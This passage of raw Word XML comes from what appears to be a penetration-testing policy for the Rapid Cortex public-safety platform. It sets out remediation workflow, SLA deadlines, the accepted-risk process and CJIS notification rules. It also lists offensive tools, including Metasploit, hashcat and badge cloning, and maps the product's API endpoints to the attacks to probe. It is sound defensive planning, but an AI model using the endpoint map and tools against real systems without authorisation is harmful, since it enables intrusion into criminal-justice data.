      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Every report must include a one-page executive summary with:</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Total findings by severity (Critical / High / Medium / Low / Informational)</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Testing dates and scope</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Testing methodology summary</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Top 3 most critical findings — one sentence each</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Overall risk rating — Critical / High / Medium / Low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation timeline and ownership</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Remediation Tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All findings must be tracked to resolution. The security engineering team owns the remediation tracker. Finding owners are assigned at the debrief meeting immediately following each engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding reported and severity assigned by tester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dev team confirms reproducibility within 24 hours of report delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding assigned to an owner in the issue tracker (GitHub Issues / Jira)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix developed and deployed to staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tester verifies fix in staging (or internal team if tester not available)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix deployed to production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding marked Resolved with resolution date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SLA Tracking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1440"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="3240"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Confirm Repro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Fix in Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Fix in Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Verify Fixed</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Critical</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Same day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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24–48 hours</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48–72 hours</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Same day as prod deploy</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High</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24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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 business days</w:t>
            </w:r>
          </w:p>
        </w:tc>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7 business days</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Within 3 days of prod deploy</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Medium</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48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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21 days</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30 days</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Within 7 days of prod deploy</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Low</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 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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60 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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90 days</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At next quarterly review</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Informational</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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Next sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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Next release</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At next review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Accepted Risk Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Not every finding will be remediated. When a finding is accepted as a known risk:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk acceptance must be approved by the CTO or VP Engineering in writing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The business justification must be documented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An expiry date must be set — accepted risks must be re-evaluated annually</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Compensating controls must be documented if available</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CJIS-relevant findings cannot be accepted as risk — they must be remediated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CJIS Notification Requirement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any Critical or High finding that affects the security of Criminal Justice Information must be reported to affected agency Information Security Officers within 24 hours of discovery, per CJIS Security Policy Section 5.10.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure to notify affected agencies of a Critical finding within the CJIS-required timeframe is a compliance violation that may result in loss of CJIS connectivity for those agencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A — Quick Reference: Tools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1440"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Primary Use</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Nmap</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Port Scanning</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apt install nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Service discovery</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Burp Suite Pro</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Web Testing</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portswigger.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Intercept, replay, active scan</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Metasploit</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Exploitation</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apt install metasploit-framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Known exploit modules</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ffuf</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Fuzzing</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go install github.com/ffuf/ffuf/v2@latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Endpoint/parameter fuzzing</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jwt_tool</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JWT Testing</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pip3 install jwt_tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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JWT attack vectors</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hashcat</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Password Cracking</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apt install hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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JWT secret brute force</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Semgrep</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SAST</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pip3 install semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Code vulnerability patterns</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Gitleaks</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Secret Detection</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brew install gitleaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Hardcoded secrets</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TruffleHog</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Secret Detection</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pip3 install trufflehog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Git history scanning</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OWASP ZAP</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DAST</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zaproxy.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Automated web app scanning</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Nuclei</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CVE Scanning</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go install nuclei@latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Template-based CVE checks</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GoPhish</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Social Engineering</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getgophish.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Phishing simulation</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Proxmark3</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Physical / RFID</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Hardware + firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Badge cloning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Volatility 3</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Memory Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>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pip3 install volatility3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Process memory analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Shodan CLI</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Passive Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>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pip3 install shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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External asset discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix B — Rapid Cortex Attack Surface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1440"/>
        <w:gridCol w:w="720"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Endpoint / Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Auth Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Risk Notes</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POST /api/cad/cap/ingest/{agencyId}</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X-RC-Cap-Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Yes</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XML injection, rate limit, FIPS routing</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GET /api/report/{qrId}</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None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Yes</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Scan count manipulation, deactivated code bypass</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POST /api/integrations/ring/login</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JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Yes</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OAuth redirect, state collision</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GET /api/integrations/ring/callback</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OAuth code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Yes</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Code replay, token leakage</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GET /api/integrations/ring/user-status</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None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Yes</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Status spoofing</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POST /api/cad/writeback/{incidentId}</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JWT dispatcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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No</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CSRF, own-submission bypass</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POST /api/admin/cad-writeback-approvals/*/approve</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JWT supervisor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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No</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Race condition, own-approval</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GET /api/admin/pricing/global</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JWT rcsuperadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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No</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Revenue data exposure</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PUT /api/admin/pricing/tenants/{id}</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JWT rcadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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No</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Unauthorized price manipulation</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GET /api/agencies/{id}/invoices</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JWT billing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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No</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Cross-tenant invoice access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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GET /api/admin/cad-integrations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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JWT agencyadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Cross-agency integration leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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POST /api/admin/qr-nfc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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JWT agencyit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Role bypass — dispatcher creating codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
